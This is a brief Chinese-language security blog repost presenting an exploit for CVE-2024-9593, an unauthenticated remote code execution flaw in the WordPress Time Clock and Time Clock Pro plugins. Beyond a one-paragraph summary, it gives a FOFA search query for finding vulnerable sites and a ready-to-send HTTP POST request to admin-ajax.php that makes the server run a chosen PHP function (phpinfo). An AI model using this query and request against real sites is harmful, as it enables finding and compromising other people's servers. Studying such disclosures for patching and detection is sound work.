CVE-2024-9593 WordPress插件的远程代码执行 CVSS 8.3 高危漏洞 EXP

admin 2024年11月6日22:52:33评论32 views字数 603阅读2分0秒阅读模式

WordPress 的 Time Clock 插件和 Time Clock Pro 插件在 1.2.2(对于 Time Clock)和 1.1.4(对于 Time Clock Pro)及以下版本中容易通过“etimeclockwp_load_function_callback”函数受到远程代码执行的攻击。这允许未经身份验证的攻击者在服务器上执行代码。无法指定调用函数的参数。

fofa-query:body="/wp-content/plugins/time-clock/"||body="/wp-content/plugins/time-clock-pro/"

POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/2Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3Content-Type: application/x-www-form-urlencodedContent-Length: 16function=phpinfo

原文始发于微信公众号(合规渗透):CVE-2024-9593 WordPress插件的远程代码执行 CVSS 8.3 高危漏洞 EXP

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月6日22:52:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-9593 WordPress插件的远程代码执行 CVSS 8.3 高危漏洞 EXPhttps://cn-sec.com/archives/3363602.html

发表评论

匿名网友 填写信息